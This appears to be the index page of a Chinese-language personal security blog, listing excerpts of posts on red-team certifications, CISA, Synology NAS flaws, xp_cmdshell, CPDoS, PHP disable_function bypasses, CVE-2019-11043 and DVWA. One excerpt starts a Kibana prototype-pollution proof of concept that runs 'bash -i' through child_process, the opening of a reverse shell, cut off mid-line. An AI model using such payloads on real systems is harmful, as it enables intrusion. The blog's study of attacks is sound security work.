波波的寂寞世界

2021-10-11波波閱讀(1395)贊(2)

我的 Certified Red Team Professional (CRTP) 之旅 2021 我完成了由 PentesterAcademy (https://www.pentesteracademy.com/activedirecto...

2021-10-03波波閱讀(1313)贊(0)

過陣子再來分享 AD 的攻防證照考試，今天來點特別的分享... 波波最近跑去考了 ISACA 的 CISA (國際電腦稽核師) 證照... CISA 考試外面有很多分享，像是 Kuro Huang 大神 https://medium.com...

2021-06-17波波閱讀(566)贊(1)

2021 年 5 月 27 日，HITB 2021 會議上分享了 Synology NAS 的多個漏洞，Synology Calendar、Media Server、Audio Station 等套件中的漏洞可通過 Web 服務入口遠端利用...

2021-05-26波波閱讀(888)贊(0)

時常需要對 SQL Server xp_cmdshell 進行設定，筆記一下。 文章資料來源：https://www.cnblogs.com/jerrylocker/p/10938899.html xp_cmdshell 第一種：在SQL ...

2019-10-25波波閱讀(623)贊(0)

What is CPDoS? Cache-Poisoned Denial-of-Service (CPDoS) is a new class of web cache poisoning attacks aimed at disabling...

2019-10-24波波閱讀(686)贊(0)

原文連結： https://blog.szfszf.top/tech/php%E7%BB%95%E8%BF%87disable_function-%E6%80%BB%E7%BB%93%E4%B8%8E%E5%AE%9E%E8%B7%B5/ ...

2019-10-23波波閱讀(705)贊(0)

This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible...

2019-10-23波波閱讀(863)贊(0)

本文將探討如何利用ATT&CK站在攻擊者視角來組織和實踐Red Teaming行動，更加有針對性的模擬真實世界的攻擊者以達到“實戰養兵”的目的。 原文連結：https://mp.weixin.qq.com/s/u1cPkGegyRp...

2019-10-18波波閱讀(704)贊(3)

POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i...

2019-10-18波波閱讀(1294)贊(1)

DVWA（Damn Vulnerable Web Application） DVWA（Damn Vulnerable Web Application）是一個用來進行弱點安全測試的網站系統，旨在為安全專業人員測試自己的專業技能和工具提供合法的...